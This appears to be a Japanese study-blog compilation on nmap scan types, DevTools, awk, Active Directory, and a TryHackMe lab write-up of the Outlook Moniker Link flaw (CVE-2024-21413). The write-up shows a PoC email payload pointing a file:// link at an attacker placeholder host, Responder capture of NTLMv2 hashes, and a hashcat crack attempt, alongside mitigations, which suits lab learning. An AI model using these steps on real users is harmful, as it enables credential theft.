返ってくるもの：SYN/ACK（open）／RST（closed）／無応答（filtered）。
長所：確実で簡単（OS 標準の接続なので結果は信頼できる）。
短所：ログに残りやすく検出されやすい。
オプション：-sT

SYNスキャン

何をするか：SYNを送り、SYN/ACKを受けたら自分はRSTで接続を切る（3ウェイを完了させない）。
返ってくるもの：SYN/ACK（open）、RST（closed）、無応答（filtered）。
長所：早くてステルス寄り（ログに残りにくい）。多くの場合デフォルトで使われる。
短所：root権限が必要。IDSに検出される可能性はある。
オプション：-sS

UDPスキャン

何をするか：UDPパケットを送って応答（ICMP unreachable や UDP 応答）を待つ。
返ってくるもの：UDP応答（open|filtered判定）、ICMP Port Unreachable（closed）、無応答（open|filtered）。
長所：TCP以外のサービス（DNS, SNMP 等）を見つけられる。
短所：遅い（再送や ICMP 制限のため）、ファイアウォールやICMPレート制限で誤判定しやすい。
オプション：-sU

NULLスキャン

何をするか：TCPフラグをすべて 0 にしたパケットを送る（SYN/ACK/FIN/… いずれも 0）。
返ってくるもの（一般）：
Linux/UNIX系：何も返さない（open）かRSTで返す（closed）など実装差がある。
Windows系：通常すべてのポートで RST を返す（これだと区別つかない）。
長所：一部のOSでステルスに振る舞う。
短所：実装依存で結果が解釈しづらい。ファイアウォールで無効化されることが多い。
オプション：-sN

FINスキャン

何をするか：TCPの FIN フラグのみを立てたパケットを送る。
返ってくるもの：TCP 実装により、閉じているポートは RST を返し、開いているポートは無応答（特定OSでは）→ これで判別する。
長所：一部の環境で検出されにくい。
短所：Windows系は常に RST を返すため無意味。ファイアウォールでドロップされると判別不能。
オプション：-sF

Xmasスキャン

何をするか：TCPの FIN, PSH, URG フラグを同時に立てた「派手な」パケットを送る（ツリーが光るから Xmas）。
返ってくるもの：FIN と同様、ある実装では無応答＝open、RST＝closed。
長所：NULL/FIN と同じく、一部OSでステルスに有効。
短所：同じく実装依存で不確実。Windowsでは通用しないことが多い。
オプション：-sX

ICMPスキャン

何をするか：ICMP Echo Request（ping）や他のICMP型を使ってホストがオンラインかを調べる。
返ってくるもの：Echo Reply（Up）／無応答（Down or filtered）／ICMP unreachable（到達不可）など。
長所：ホストの存在確認が速く簡単。
短所：多くのホストやファイアウォールがICMPをブロックするため誤判定が起きやすい。ARP ping はローカルで有効。
オプション：-sn -PE（ICMP echo）、–disable-arp-ping 等で挙動調整

TCPフラグ

フラグ、ビット、フラグの意味を記載。
ビット(値)は tshark のフィルターとかで結構使う。

視覚的ビット列図（よく見る組み合わせ）

代表的なオプション

最後に

色々まとめたけど リファレンスガイド を見るのが正確で早い。

はじめに

不審サイトの調査などで Chrome DevTools をよく使うので自分用メモ。
ここでは概要をつかむための簡単な解説だけ。詳細はいずれ別記事で書けたら書く。

DevTools とは

DevTools（デブツールズ）は、Webブラウザに標準搭載されている「開発者向けツール」。
画面上の要素を調べてデザイン崩れを修正したり、ネットワーク通信を確認して読み込みエラーを特定したり、
コンソールでエラーメッセージやログを確認したりできる。
名前の通り、本来は開発者向けツールだがセキュリティ調査でも補助ツールとして使われる。

今回は Chrome に搭載されている DevTools の機能を解説。

DevTools の概要

DevTools の開き方

Macの場合
Cmd + option + I

Windowsの場合
Ctrl + Shift + C もしくは F12

DevTools 画面例

DevTools のパネルメニュー

セキュリティの観点で各パネルをどのように利用するか記載。

Elements（エレメンツ）

用途：Webページの構造（HTML）やクライアント側のDOM要素¹を確認。

使用例：
悪意あるスクリプト（例：<script>タグ内のXSSペイロード）をページ内で検出できる。
inputフォームの属性（maxlengthやrequiredなど）を確認してクライアントサイド検証の甘さを見抜く。
非表示（display:none）の要素や、意図的に隠されたトークン値などもDOM上で確認可能。

Console（コンソール）

用途：ブラウザで発生しているJavaScriptエラー・警告の確認。

使用例：
脆弱なスクリプト読み込み（HTTP通信など）が警告として出る。
エラー文から内部APIのエンドポイントや認証処理の構造が推測できる場合もある。
XSSテスト時にペイロードが実行されているか確認するのにも使える。

Sources（ソース）

用途：JavaScriptやCSS、画像ファイルの確認。

使用例：
公開されている .js ファイルから機密ロジックやAPIキーのハードコーディング²を発見できる。
JSのマップファイル（.map）が残っていると難読化されたコードを簡単に復元できる。
コメント内に内部仕様やURLが書かれていないか確認できる。

Network（ネットワーク）

用途：Webページがやり取りしている通信（HTTPリクエスト・レスポンス）を確認。

使用例：
HTTPヘッダー（Cookie, Authorization, CSP, CORSなど）を確認できる。
CookieのSecure / HttpOnly / SameSite 属性の設定をチェック。
API通信のレスポンスを観察して、過剰情報漏えい（PII³や内部ID）がないか確認できる。

Performance（パフォーマンス）

用途：処理や描画のタイミングを計測し、スクリプト挙動を把握。（Webページが“どんなタイミング”で“何をしているか”を記録して、時間軸で見える化するツール）

使用例：
攻撃者が仕込んだマルウェアスクリプトや追跡コードが異常にCPUを消費していないかを確認できる。
通常とは異なるタイミングで外部通信が発生していないかを監視可能。

Memory（メモリ）

用途：Webアプリの動作中に使われるメモリの状態を分析。

使用例：
クライアント側で扱っているデータが、不要に保持・漏洩していないか確認できる。
セッション情報やトークンがメモリ上に残り続けていないかを調査。

Application（アプリケーション）

用途：ブラウザに保存されたデータ（Cookie、LocalStorageなど）を確認。

使用例：
LocalStorageやSessionStorageにアクセストークンや個人情報が保存されていないか確認。
Cookie設定（Secure / HttpOnly / SameSite）を確認して脆弱な設定を検出。
キャッシュデータやService Workerの構成から、古いリソースが残っていないか確認。

Privacy and Security（プライバシーとセキュリティ）

用途：通信の安全性と証明書状態を確認。

使用例：
SSL/TLS証明書の有効期限・暗号スイートを確認。
Mixed Content（HTTPSページ内でHTTPリソースを読み込む危険な構成）があるか検出。
Cookieの追跡情報やセキュリティポリシーの確認にも使える。

Lighthouse（ライトハウス）

用途：Webサイト全体を自動診断（パフォーマンス・セキュリティ・アクセシビリティなど）。

使用例：
HTTPSが有効か、セキュリティヘッダー（CSP、X-Frame-Optionsなど）が設定されているか自動チェック。
セキュリティ的な改善ポイントをレポート形式で提示してくれる。

Recorder（レコーダー）

用途：操作の記録・再生（Webアプリの自動テスト）。

使用例：
CSRFテストなどで再現性を保つための操作手順を自動記録できる。
ペネトレーションテスト時に攻撃パターンを再生・再現する用途でも使われる。　…かも。（ChatGPTに聞いたけど、本当にそのような使い方がされているのか調べきれなかった。）

1. DOM（ブラウザがHTMLを解析して作るページの構造モデル）内の1つ1つの部品（例：div, p, inputなど）。 ↩︎
2. 設定や機密情報をプログラムの中に直接書いてしまうこと。 ↩︎
3. 個人情報。 ↩︎

最後に

簡易調査で限られた機能しか使っていなかったので、まとめ用に調べてみると思っていたよりもできることが多そう。もう少し使いこなせるようになりたい。

awkコマンドとは

awk（オーク）はテキストを1行ずつ読みながら、1行をくつかの列（フィールド）に分けて読む・抜き出す・加工するためのコマンド。
たとえば、ログの「3列目だけ取りたい」時にawkが便利。

awkの基本構文

awk の基本構文は以下。

awk 'パターン { アクション }' ファイル名

パターン＝どんな行を選ぶか
アクション＝その行で何をするか

ざっくり言うと 「ファイルの中で、〇〇な行があったら、△△をする」。

awkの基本をサンプルから覚える

サンプル

サンプルとして使用するファイルの内容。
各行は「名前・年齢・都市・職業」の4つのフィールドで構成されている。

# sample.txt
Alice   25  Tokyo     Engineer
Bob     30  Osaka     Manager
Charlie 28  Nagoya    Designer
David   35  Fukuoka   Engineer
Eve     22  Tokyo     Intern

サンプルファイルの分解

タブやスペースごとに awk が自動で以下表のように読み込んでくれる。

実際に動かしてみる

行全体を表示

print で出力し、$0 でその行全体（すべてのフィールド）を指定。

$ awk '{print $0}' sample.txt

ファイル全体を見たいなら cat でいい気がするので、実務では使わないかも。

# sample.txt
Alice   25  Tokyo     Engineer
Bob     30  Osaka     Manager
Charlie 28  Nagoya    Designer
David   35  Fukuoka   Engineer
Eve     22  Tokyo     Intern

1列目（名前）だけ表示

$1 で名前フィールドを出力。

$ awk '{print $1}' sample.txt

これだけだとコメント（#）まで出力されてしまうので、実務ではもう少し条件を絞った方がよさそう。

#
Alice
Bob
Charlie
David
Eve

コメント（#）を除外

! = ～でない、/文字列/ = 正規表現の始まりと終わりを示す囲み記号、^ = 先頭行 の意味。
先頭行がコメント（#）でない名前フィールドを出力。

$ awk '!/^#/ {print $1}' sample.txt

コメント（#）が除外され、名前のフィールドだけが出力される。

Alice
Bob
Charlie
David
Eve

名前と都市を表示

$1 で名前フィールド、$3 で都市フィールドを指定。

$ awk '{print $1, $3}' sample.txt

それぞれのフィールドが正しく抽出されている。

# 
Alice Tokyo
Bob Osaka
Charlie Nagoya
David Fukuoka
Eve Tokyo

Tokyo に住んでいる人だけ表示

$3 を == で Tokyo 指定。

$ awk '$3 == "Tokyo" {print $0}' sample.txt

Tokyo に住んでいる人だけが抽出される。

Alice   25  Tokyo     Engineer
Eve     22  Tokyo     Intern

年齢が30歳以上の人だけ表示

$2 >= 30 で指定。ついでにコメントも && でつなげて除外しておく。

$ awk '!/^#/ && $2 >= 30 {print $1, $2}' sample.txt

30歳以上の人だけが抽出される。

Bob 30
David 35

Engineerの人数を数える

$4 == “Engineer” で エンジニアを指定、{count++} で条件が真なら count を 1 増やす、END {print count} でファイルを全部読み終わったあとに出力。

$ awk '$4 == "Engineer" {count++} END {print count}' sample.txt

きちんとカウントされている。

2

平均年齢を計算

{sum += $2; count++} で 2 列目（年齢）の値を合計し、行数を 1 増やす。
END {print sum/count} でファイルをすべて読み終えたあとに平均を出力する。
※今回はカウント処理を行うため、コメント（#）のスキップが必須。

; は改行と同じ意味。

$ awk '!/^#/ {sum += $2; count++} END {print sum/count}' sample.txt

平均年齢が出力される。

28

このコマンドの動きは以下の通り。

都市ごとの人数を集計

{city[$3]++} で 3 列目（都市名）をキーとしてカウントする。
END { … } はファイルをすべて読み終えたあとに 1 回だけ実行される処理。
for (c in city) ですべての都市（キー）を順に処理し、
print c, city[c] で都市名と人数を出力する。
※今回はカウントをしているのでコメントのスキップは必須。

$ awk '!/^#/ {city[$3]++} END {for (c in city) print c, city[c]}' sample.txt 

都市ごとの人数が出力される。

Osaka 1
Fukuoka 1
Nagoya 1
Tokyo 2

このコマンドの動きは以下の通り。

疑問に思ったこと

文章ベースのファイルにはawkコマンドは使えないのか

たとえば、

Aliceは東京で働いています。
Bobは大阪に住んでいます。
Charlieは28歳です。

という文章ファイルがあった場合、awk の使いどころがあるのか気になった。

awk の動きとしては「スペースやタブで明確に区切られていない」文章だと、

$1 Aliceは東京で働いています。
$1 Bobは大阪に住んでいます。
$1 Charlieは28歳です。

となり、すべて $1 になるのでフィールド分けができず、awk の長所は活かせない。

一応、grep のように抽出することは可能。

$ awk '/東京/ {print $0}' sample_text.txt
Aliceは東京で働いています。

$ awk '/[0-9]+歳/ {print $0}' sample_text.txt
Charlieは28歳です。

行番号を付けることもできる。

$ awk '{print NR, $0}' sample_text.txt
1 Aliceは東京で働いています。
2 Bobは大阪に住んでいます。
3 Charlieは28歳です。

結論としては、awk でも文章ファイルの操作はある程度できるけど、本来の用途とは離れており、わざわざ awk で文章ファイルを操作する必要はなさそう。

はじめに

Moniker Link (CVE-2024-21413) の備忘録。
本記事は学習記録です。演習環境のターゲット名・IP・フラグは公開していません。

本記事の内容は教育目的のみに記載しています。実環境での悪用は犯罪行為です。必ず許可された演習環境でのみ実践してください。

TryHackMe

Moniker Link (CVE-2024-21413) Leak user’s credentials using CVE-2024-21413 to bypass Outlook’s Protected View.

Moniker Link (CVE-2024-21413) 

Moniker Link（モニカー・リンク）とは

Moniker Link は Windows のComponent Object Model（COM）¹で使われる「モニカー（識別子）」を指す仕組みの一種で、Outlook がメール中の特定のリンク（例えば file:// で始まるリンク）を処理するときに Moniker Link として解釈されることがある。

特定の形式（末尾に ! を含める等）にすると Outlook の「Protected View（保護ビュー／保護モード）」を回避してしまいリモートのファイルを読み込みにいってしまう問題が見つかった。これを悪用するとユーザーの認証情報（netNTLMv2 ハッシュ）を攻撃者に送らせることができる。

CVE-2024-21413

Outlook が特定のリンク（特に file:// スキームで始まり、後に ! 記号を含むような形式）を解釈すると、リンク先リソースにアクセスを試み、その過程で NTLM 認証情報（netNTLMv2 ハッシュ）を自動的に送信してしまうという挙動が発生するように設計上の欠陥があることが発見された。

さらに、悪意あるリンクを使えば Protected View（保護モード／読み取り専用モード）をバイパスして、ファイルを編集モードで開かせる・実行させるような挙動を誘導でき、その結果、リモートコード実行（Remote Code Execution, RCE）を引き起こす可能性も指摘されている。

実演

Responder で待ち受け

まずは Responder² で待ち受け。

# インターフェースの特定
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    ~以下IP情報（マスク）~

2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    ~以下IP情報（マスク）~

3: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
    ~以下IP情報（マスク）~

# tun0で待ち受け
sudo responder -I tun0 

exploit.py の編集

GitHub のコードをコピペし編集。

GitHub

GitHub – CMNatic/CVE-2024-21413: CVE-2024-21413 PoC for THM Lab CVE-2024-21413 PoC for THM Lab. Contribute to CMNatic/CVE-2024-21413 development by creating an account on GitHub.

# 行を表示しエディタを開く
nano -l exploit.py

17行目の ATTACKER_MACHINE を 待ち受け端末のIPに変更。

<p><a href="file://ATTACKER_MACHINE(※ここをIPアドレスに変更)/test!exploit">Click me</a></p>

31行目の MAILSERVER をターゲットマシンのIPに変更。

server = smtplib.SMTP('MAILSERVER(※ここをIPアドレスに変更)', 25)

ターゲットマシンの Outlook を起動

ターゲットマシンの Outlook を起動。

exploit.py を実行

exploit.py を実行。
このコードを実行するとターゲットマシンにメールが送信される。

# exploit.py を実行
$ python3 exploit.py                                          
Enter your attacker email password: ********

 Email delivered

Outlook で届いたメールのリンクをクリック

Outlook で届いたメールのリンクをクリック。
待ち受け端末に情報が送信される。

Responder の確認

Responder で netNTLMv2 ハッシュがキャプチャされている。

[SMB] NTLMv2-SSP Client   : x.x.x.x
[SMB] NTLMv2-SSP Username : THM-MONIKERLINK\tryhackme
[SMB] NTLMv2-SSP Hash     : tryhackme::THM-MONIKERLINK:a2b23215af9cc5d0:ハッシュが表示される                                           
[*] Skipping previously captured hash for THM-MONIKERLINK\tryhackme
[*] Skipping previously captured hash for THM-MONIKERLINK\tryhackme
[*] Skipping previously captured hash for THM-MONIKERLINK\tryhackme
[*] Skipping previously captured hash for THM-MONIKERLINK\tryhackme
[*] Skipping previously captured hash for THM-MONIKERLINK\tryhackme
[*] Skipping previously captured hash for THM-MONIKERLINK\tryhackme
[*] Skipping previously captured hash for THM-MONIKERLINK\tryhackme
[*] Skipping previously captured hash for THM-MONIKERLINK\tryhackme

エラーが発生する

test!exploit のような共有は存在しないため、Outlook は「We can’t find ‘…\test!exploit’」というエラーを出す。
これはファイルが無いことを示す正常な挙動。ただし、重要なのはエラーが表示される前にクライアントは外部ホストへ接続を試み、NTLMによる認証ハンドシェイクが発生する点。攻撃者はこのハンドシェイクで得られるチャレンジ／レスポンスの情報を受け取る。

対策

一部対策を紹介。

公式修正を適用する

Microsoft が公開しているセキュリティ更新を適用。

カスタムルールで検出

GitHub 上でFlorian Roth 氏によって作成・公開された YARA³ ルールが利用可能。

GitHub

signature-base/yara/expl_outlook_cve_2024_21413.yar at master · Neo23x0/signature-base YARA signature and IOC database for my scanners and tools – Neo23x0/signature-base

疑問に思ったこと

なぜ netNTLMv2 ハッシュが取得されると危険なのか

NTLM認証はチャレンジ／レスポンス方式で行われ、パスワードそのものは送信されない。
そのため、「ハッシュを取られても意味がないのでは？」と疑問に思った。
調べてみると、ハッシュが窃取されると次の攻撃に繋がるため危険だということが分かった。

例えば、
取得したハッシュ値をオフラインで解析（クラック）できる。
（オフラインで行うため検知されず、何度でも試行可能。）

また、受け取った認証情報を他のサービスへの認証にそのまま使える条件が揃えば、
リレー攻撃（Relay Attack）によって権限を横展開できる。

このようにハッシュの窃取自体が次の侵入の足掛かりになるため、危険性が高い。

ハッシュではなくレスポンスが窃取されるのではないか

「NTLM認証はレスポンスを返すので、レスポンスが窃取されるのであって、ハッシュは取られないのでは？」と疑問に思った。調べてみると表現の問題だったようで、正確にはチャレンジ（server_challenge）とレスポンス（response）がセットで窃取されているとのこと。

シーケンス図

ユーザー端末 (Client)            サーバ (Server)            攻撃者 (Attacker)
-------------------            -------------            ------------------
1. Negotiate ----------------->                              （認証方式の提案）
                               2. ServerChallenge ----------> （チャレンジ送信）
<-- (Challenge) -------------  

3. Client: 内部計算
   - NTLMv2_hash = HMAC_MD5( NTLM_hash(PW), User+Domain )
   - ClientBlob = {timestamp, client_challenge, ...}
   - NTLMv2_response = HMAC_MD5( NTLMv2_hash, ServerChallenge ∥ ClientBlob )
                             
4. Client --------------------> Server
   （NTLMv2_response ＋ ClientBlob を送信）
                            ↑
                            |  （同じレスポンスを攻撃者が待ち受けて受信可能）
                            |  攻撃者は名前解決/SMB等でこのやり取りを誘発・傍受
                            v
   Attacker captures: {ServerChallenge, NTLMv2_response, ClientBlob, Username, Domain, ClientIP}

おまけ

窃取した netNTLMv2 ハッシュを rockyou.txt で辞書攻撃してみたが、パスワードは見つからなかった。

# hashcat で辞書攻撃
$ hashcat -m 5600 -a 0 hashcat_test /usr/share/wordlists/rockyou.txt

# マスク済み出力（抜粋）
hashcat (v6.2.6) starting

Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: TRYHACKME::<REDACTED_HASH>
Time.Started.....: Tue Oct  7 21:22:25 2025 (6 secs)
Speed.#1.........:  2317.3 kH/s
Recovered........: 0/1 (0.00%)
Progress.........: 14344385/14344385 (100.00%)

# 結果確認（回復済みパスワードの表示）
$ hashcat -m 5600 --show hashcat_test
# （出力が何もなければ、辞書で回復できていないことを意味する）

1. Microsoft が開発した Windows 上で動く部品（コンポーネント）同士をやり取りさせるための仕組み。 ↩︎
2. ネットワーク上の名前解決プロトコルを悪用して偽の応答を返し、資格情報（NTLM ハッシュ等）を収集するオープンソースのツール。 ↩︎
3. マルウェアや攻撃の痕跡（IoC：Indicator of Compromise）を検出するためのパターンマッチ用ルール言語。 ↩︎

はじめに

Active Directory Basics の備忘録。
本記事は学習記録です。演習環境のターゲット名・IP・フラグは公開していません。

TryHackMe

Active Directory Basics This room will introduce the basic concepts and functionality provided by Active Directory.

Active Directoryの基礎

Active Directoryとは

Active Directory は企業や組織のユーザーやパソコンをまとめて管理するサービス。

何ができるか

住所録の役割
・社員（ユーザー）
・パソコンやサーバー（コンピューター）
・プリンタなどの機器
これらを「誰が」「どこに」「どういう権限で」存在するのか、まとめて記録。

鍵の役割
・社員が会社のパソコンにログインするとき
・社員が社内のファイルサーバーにアクセスするとき
IDとパスワードをチェックし、その人が使えるものだけ使わせるように制御。

Active Directory の主な機能

ユーザー管理：社員アカウントを一元管理
コンピューター管理：PCやサーバーをまとめて管理
認証（ログインチェック）：誰が正しいユーザーか確認
権限付与（アクセス制御）：どこまで操作できるか決定
ポリシー配布（GPO）：全社PCに一括でルール設定（例：パスワードは10文字以上）

Windowsドメインとは

組織全体のPCとユーザーをまとめたグループ。

ドメインコントローラー（DC）

ドメインの中心にいるのが ドメインコントローラー (Domain Controller, DC)。
これは Active Directory が入った Windows サーバーで、以下の役割がある。

誰がログインできるか認証する
ユーザーやPCの情報を記録する
セキュリティポリシーを配布する

ドメインに参加するとどうなるか

会社のPCを「ドメインに参加」させると、
そのPCはドメインコントローラーのルールに従うようになる。

社員がどのPCからログインしても、同じIDとパスワードで入れる
営業部の人だけ営業フォルダを見れる、といった権限管理ができる
パスワードの長さやWindows Updateの設定を一括で適用できる

Active Directory のオブジェクト

Active Directory の世界ではネットワーク上に存在するものはすべて「オブジェクト」 として管理される。

代表的なオブジェクト

ユーザー (User)
社員や管理者など人を表すオブジェクト
ユーザーはセキュリティプリンシパル（認証され、権限を持てるオブジェクト）
ユーザーは2種類に分けられる
People：社員など、人間がログインするためのユーザー
Services：サービス（IIS、MSSQL など）を動かすために使うユーザー

コンピュータ (Computer)
ドメインに参加したPCやサーバーを表すオブジェクト
例：PC01$ のように末尾に「$」が付く
OS自身が使うアカウントで、人間が直接ログインすることは想定されていない

セキュリティグループ (Security Groups)
複数のユーザーやコンピュータをまとめて管理する入れ物
1人ずつ権限を与えるよりグループ単位でアクセス制御する方が効率的

OU（組織単位：Organizational Unit）
部署やチームごとにユーザーやコンピュータをまとめる入れ物
例：「IT部門」「営業部門」など
OUにポリシーを適用すると所属するユーザーやPCに自動で反映される

セキュリティグループ (Security Groups)

アクセス権限をまとめて管理するためのグループ。

代表的なデフォルトセキュリティグループ

GPO（Group Policy Object）とは

Windowsドメイン環境でユーザーやコンピュータに対して一括で設定を配布する仕組み。

何ができるか

セキュリティ系
パスワードポリシー（長さ・複雑さ・有効期限など）
アカウントロックアウトの回数制限
Windows Updateの自動適用

ユーザー環境系
デスクトップの壁紙を会社のロゴに固定
コントロールパネルの使用禁止
特定のアプリケーション起動を制御

コンピュータ設定系
共有フォルダの自動マウント
スクリーンセーバーや自動ロックの設定
ファイアウォールやサービスの動作ルール

GPOの適用対象

GPOは「どこにリンクするか」で適用対象が決まる。

ドメイン全体（例：すべてのユーザーにパスワードポリシーを適用）
OU単位（例：営業部PCだけUSBメモリを禁止）
サブOUも継承（OUにリンクしたら、その下のOUにも適用される）

仕組み

1.管理者が GPMC（Group Policy Management Console） でGPOを作成
2.そのGPOをOUやドメインにリンクする
3.ドメインに参加しているユーザーやPCが定期的にGPOを取得（gpupdate）
4.自動的に設定が適用される

配布される仕組みは SYSVOL 共有フォルダ（ドメインコントローラ上）を通じて行われる。

認証方法

Kerberos認証

Active DirectoryでユーザーがログオンするときWindowsは内部で「Kerberos（ケルベロス）認証」という仕組みを使っている。

Kerberosとは

Kerberosはネットワーク上で「安全に」「何度もパスワードを送らずに」認証を行うためのプロトコル。
Windowsドメインでは標準の認証方式として使われている。

例えば、会社のパソコンで一度ログインした後、ファイルサーバーやプリンタ、社内サイトにアクセスしても再びパスワードを入力する必要がないのはこのKerberosが動いているから。

Kerberosの仕組み

用語

Client（クライアント）：ユーザーが操作するPC
KDC（Key Distribution Center）：認証の中心となる仕組み。ドメインコントローラー（DC）上で動作
Service（サーバー）：ファイル共有やデータベースなどの利用したいリソース
TGT（Ticket Granting Ticket）：サービス用チケットをもらうためのチケット
TGS（Ticket Granting Service Ticket）：実際にサービスへアクセスするためのチケット

仕組み

Step 1：TGT（チケット発行チケット）をもらう

ユーザーはまず「ユーザー名」と「タイムスタンプ（時刻情報）」を自分のパスワードから作られた鍵で暗号化してKDCに送る。これが「TGTをください」というリクエスト。

KDC（ドメインコントローラー）はユーザー情報を確認し、
TGT（Ticket Granting Ticket）
セッションキー（Session Key）
をユーザーに返す。

TGTは「krbtgt」という特別なアカウントのパスワードハッシュで暗号化されており、
ユーザー自身は中身を確認できない。

Step 2：TGS（サービス用チケット）をもらう

次にユーザーが特定のサービス（例えば「ファイル共有サーバー」や「MSSQL」）を使いたいとき、
手に入れたTGTを使ってKDCにリクエスト。

リクエストには以下が含まれる：
ユーザー名とタイムスタンプ（セッションキーで暗号化）
取得済みのTGT
SPN（Service Principal Name：接続したいサービス名）

KDCはそれを受け取り、
TGS（サービスチケット）
サービスセッションキー（Svc Session Key）
を発行して返す。

TGSはそのサービスの「所有者アカウント（Service Owner）」のハッシュで暗号化されており、
サービスだけが中身を復号できる。

Step 3：サービスへのアクセス

最後にユーザーは受け取ったTGSを使ってサービスに接続。
サービスは自分の「Service Owner Hash」でTGSを復号し、ユーザーを認証。

これによりパスワードを再送することなく、安全にサービスを利用可能。

要約

Client

KDCさん、私は Username + Timestamp を自分のパスワード鍵で暗号化して送ります。身分証（TGT）をください！

KDC

確認できました。これは TGT と Session Key です。TGT は krbtgt のハッシュ で暗号化してありますよ。

Client

今度は SPN=MSSQL/SRV に接続したいです。TGT と Session Key を使って TGS をお願いします！

KDC

了解。これは TGS と Service Session Key。TGS はサービス所有者のハッシュで暗号化済みです。

Client

サーバさん、これが TGS とタイムスタンプです。

Service（サーバー）

TGS を私のハッシュで復号…OK！認証成功。どうぞ接続してください。

遊園地に例えてみると

Client

こんにちは！この遊園地に入りたいので、チケットをください。

KDC

いらっしゃいませ。身分証を確認しますね。……はい、問題なし！
こちらがあなたのフリーパス（TGT）です。
これを持っていれば、もう一度身分証を見せる必要はありませんよ。

Client

ジェットコースターに乗りたいんですけど、このTGTで乗れますか？

KDC

ジェットコースター専用のチケット（TGS）が必要です。
あなたのTGTを確認しました、はい、これが TGS（サービスチケット） です！

Client

ジェットコースターのチケットを持ってきました。入ってもいいですか？

Service（サーバー）

TGSを確認しますね……OK！あなたは正規のチケットを持っています。
どうぞ乗車をお楽しみください！

NTLM認証

Windowsで使われる認証プロトコル（認証の仕組み）のひとつで特に古いバージョンのWindowsネットワークやファイル共有（SMB）などで利用されることがある。

NTLMとは

Microsoftが開発したWindows専用の認証プロトコル。
主にWindows NT時代（1990年代）に登場し、Active Directoryが登場する前に使われていた。

今でも以下のような場面ではNTLMが動いていることがある。
ドメイン外のPCが共有フォルダにアクセスする場合
Kerberosが利用できない古いシステムやアプリ
ローカル認証や一部のリモート接続（RDP）など。

仕組み

Step 1：認証要求（Authentication Request）

クライアント（ユーザー）はサーバーに対して「ログインしたい」というリクエストを送る。
この時点では、まだパスワードやハッシュは送られない。

Step 2：サーバーからチャレンジ（Challenge）

サーバーはクライアントに対して、ランダムな値（チャレンジ）を送る。
この値は毎回異なり、使い回し（リプレイ攻撃）を防ぐためのもの。

Step 3：レスポンスの生成と送信（NTLM Response）

クライアントは自分のパスワードから生成したNTLMハッシュ（NTLM Hash）を使って、
サーバーから受け取ったチャレンジを暗号化。

Step 4：サーバー→ドメインコントローラーへ送信

サーバーは受け取ったチャレンジとレスポンスをドメインコントローラー（DC）に転送。
実際のパスワード情報はDCが保持しているため、サーバー自身では判定できない。

Step 5：ドメインコントローラーで検証

DCは保存してあるユーザーのNTLMハッシュを使い同じチャレンジを自分でも暗号化。
生成されたレスポンスがクライアントの送ったものと一致すれば認証成功。

Step 6：認証結果をサーバーに返す

DCは認証結果（成功または失敗）をサーバーに返し、
サーバーはその結果に応じてクライアントのアクセスを許可または拒否。

要約

Client

サーバーさん、ログインしたいです！認証をお願いします！

Server

了解しました。それではこちらのチャレンジ（Challenge）をお渡しします。
この値を正しく処理して返してください。

Client

分かりました。
自分のパスワードから作られたNTLMハッシュを使って、
このチャレンジを暗号化します！

Client

Challenge ＋ NTLM Hash → Responseを作って…

Client

できました！これが私のレスポンス（Response）です！

Server

ありがとうございます。このChallengeとResponseをドメインコントローラー（DC）に確認してもらいますね。

DC

なるほど…。
こちらでも保存しているNTLMハッシュを使って同じチャレンジを暗号化してみましょう。

DC

NTLM Hash + Challenge → 自分でResponseを作って…

DC

お、クライアントのResponseと一致！これは本人ですね。

Server

DCが認証OKだそうです！
クライアントさん、ログインを許可します。ようこそ！

Active Directoryの拡張構造

Active Directory（以下AD）では単一のドメインで始まった環境をツリーやフォレストとして拡張することで、大規模組織にも対応できる。

ドメインとは

ドメインはADの管理単位。
ユーザー、コンピュータ、サーバーなどのオブジェクトをまとめて管理できる。

ツリー（Tree）とは

例えば、企業が海外展開して「UK支社」「US支社」ができた場合、それぞれのITチームが独自に管理したい。
このとき、以下のようなサブドメイン構成にすることで管理を分けられる：

thm.local（ルートドメイン）
├─ uk.thm.local（UK支社）
└─ us.thm.local（US支社）

これを「ツリー構造（Domain Tree）」と呼ぶ。
同じ名前空間（thm.local）を共有しており、各サブドメインが独立して管理可能。

各ドメインには Domain Admins（ドメイン管理者）が存在
全体を統括できるのがEnterprise Admins（エンタープライズ管理者）

つまり：
UK支社の管理者 → UK内のDCを管理
Enterprise Admin → 全支社を統括できる

フォレスト（Forest）とは

フォレストは、異なるドメインツリーをまとめた最上位の構造。
例えば、会社「THM Inc.」が「MHT Inc.」を買収した場合：

🟩 フォレスト（Forest）
　┣ 🌳 ツリー1：THM.local
　┃　┣ 🍃 uk.thm.local
　┃　┗ 🍃 us.thm.local
　┗ 🌳 ツリー2：MHT.local
　　　┣ 🍃 asia.mht.local
　　　┗ 🍃 eu.mht.local

この2つを同じネットワーク内で統合したものが「フォレスト（Forest）」。
フォレスト内では、複数のツリーが異なる名前空間でも共存できる。

トラスト関係（Trust Relationship）とは

フォレストやツリーを構成すると別ドメイン間でリソース共有が必要になる。
このときに必要なのが トラスト（信頼）関係 。

一方向トラスト（One-way Trust）
片方のドメインがもう片方のドメインを「信頼する」関係。
例えば：
THM.local → MHT.local を信頼

双方向トラスト（Two-way Trust）
お互いに信頼する関係です。
例えば：
THM.local → MHT.local を信頼
THM.local ← MHT.local を信頼

これにより両方のドメインのユーザーが互いのリソースにアクセス可能となる。
（フォレストやツリーを構築するとデフォルトで双方向トラストが形成される。）

トラスト関係＝自動アクセスではない。
トラスト関係を結んだからといって自動的に全リソースにアクセスできるわけではない。
トラストは「認証を認める」仕組みであり、実際のアクセス権は別途設定が必要。

実際に動かしてみる

Task3 実演

1.OU（Organizational Units）の作成

THM OU に「Students」を作成。

左ペインで THM OU を探して右クリック。
コンテキストメニューから新規作成(New)→組織単位 (Organizational Unit) を選択。

名前を「Students」と入力して OK。

Task4 実演

1.不要なOUの削除
シナリオ：ある部門が予算削減のために閉鎖された。ルーム Task4 のチャートを確認して、不要な部門を削除する。

1-1.OUは誤って削除されないようにデフォルトで保護がかかっているので、まずはプロパティから保護を解除する。

現状では削除しようとしてもエラーになる。

表示(View)→Advanced Features(高度な機能)

プロパティ(Properties)→オブジェクト(Object)→オブジェクトを誤削除から保護する(Protect object from accidental )deletion のチェックを外す。

1-2.保護が外れたのでOUを削除。

